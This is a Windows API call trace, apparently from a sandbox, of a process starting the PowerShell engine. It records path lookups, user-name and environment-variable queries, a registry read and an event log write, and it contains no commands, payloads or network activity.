	[0872.813] SetErrorMode (uMode=0x1) returned 0x1
	[0872.813] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d410 | out: lpFileInformation=0x22d410*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0872.813] SetErrorMode (uMode=0x1) returned 0x1
	[0872.813] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0872.814] SetErrorMode (uMode=0x1) returned 0x1
	[0872.814] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d410 | out: lpFileInformation=0x22d410*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0872.814] SetErrorMode (uMode=0x1) returned 0x1
	[0872.814] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d210, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0872.814] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0872.814] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0872.814] SetErrorMode (uMode=0x1) returned 0x1
	[0872.814] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22d410 | out: lpFileInformation=0x22d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0872.815] SetErrorMode (uMode=0x1) returned 0x1
	[0872.815] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0872.815] SetErrorMode (uMode=0x1) returned 0x1
	[0872.815] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22d410 | out: lpFileInformation=0x22d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0872.815] SetErrorMode (uMode=0x1) returned 0x1
	[0872.815] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0872.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x22d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0872.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.815] SetErrorMode (uMode=0x1) returned 0x1
	[0872.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d410 | out: lpFileInformation=0x22d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0872.816] SetErrorMode (uMode=0x1) returned 0x1
	[0872.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.816] SetErrorMode (uMode=0x1) returned 0x1
	[0872.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d410 | out: lpFileInformation=0x22d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0872.816] SetErrorMode (uMode=0x1) returned 0x1
	[0872.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x22d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.817] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0872.817] SetErrorMode (uMode=0x1) returned 0x1
	[0872.817] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22d450 | out: lpFileInformation=0x22d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0872.817] SetErrorMode (uMode=0x1) returned 0x1
	[0872.817] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0872.817] SetErrorMode (uMode=0x1) returned 0x1
	[0872.817] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22d450 | out: lpFileInformation=0x22d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0872.818] SetErrorMode (uMode=0x1) returned 0x1
	[0872.818] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0872.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0872.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.818] SetErrorMode (uMode=0x1) returned 0x1
	[0872.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d450 | out: lpFileInformation=0x22d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0872.818] SetErrorMode (uMode=0x1) returned 0x1
	[0872.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.819] SetErrorMode (uMode=0x1) returned 0x1
	[0872.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d450 | out: lpFileInformation=0x22d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0872.819] SetErrorMode (uMode=0x1) returned 0x1
	[0872.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0872.829] SetErrorMode (uMode=0x1) returned 0x1
	[0872.829] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d710 | out: lpFileInformation=0x22d710*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0872.829] SetErrorMode (uMode=0x1) returned 0x1
	[0872.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0872.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0872.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0872.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0873.714] CoTaskMemAlloc (cb=0x804) returned 0x1ba30f90
	[0873.714] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba30f90, nSize=0x22da78 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22da78) returned 0x1
	[0873.715] CoTaskMemFree (pv=0x1ba30f90) 
	[0873.715] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0873.715] GetUserNameW (in: lpBuffer=0x414760, pcbBuffer=0x22dab8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22dab8) returned 1
	[0873.715] CoTaskMemFree (pv=0x414760) 
	[0873.717] ReportEventW (hEventLog=0x2030008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x315ae40*="Available", lpRawData=0x315abd0) returned 1
	[0874.280] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0874.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.281] CoTaskMemFree (pv=0x3cead0) 
	[0874.282] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0874.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.282] CoTaskMemFree (pv=0x3cead0) 
	[0874.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.293] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0874.293] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0874.293] CoTaskMemFree (pv=0x3cead0) 
	[0874.293] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0874.293] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0874.294] CoTaskMemFree (pv=0x3cead0) 
	[0874.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.296] GetCurrentProcessId () returned 0xdd4
	[0874.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.304] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22da98 | out: phkResult=0x22da98*=0x380) returned 0x0
	[0874.304] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22da1c, lpData=0x0, lpcbData=0x22da18*=0x0 | out: lpType=0x22da1c*=0x1, lpData=0x0, lpcbData=0x22da18*=0x56) returned 0x0
	[0874.304] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8af0
	[0874.304] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d9ec, lpData=0x1b9e8af0, lpcbData=0x22d9e8*=0x56 | out: lpType=0x22d9ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d9e8*=0x56) returned 0x0
	[0874.304] CoTaskMemFree (pv=0x1b9e8af0) 
	[0874.304] RegCloseKey (hKey=0x380) returned 0x0
	[0874.306] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0874.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.306] CoTaskMemFree (pv=0x3cead0) 
	[0874.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
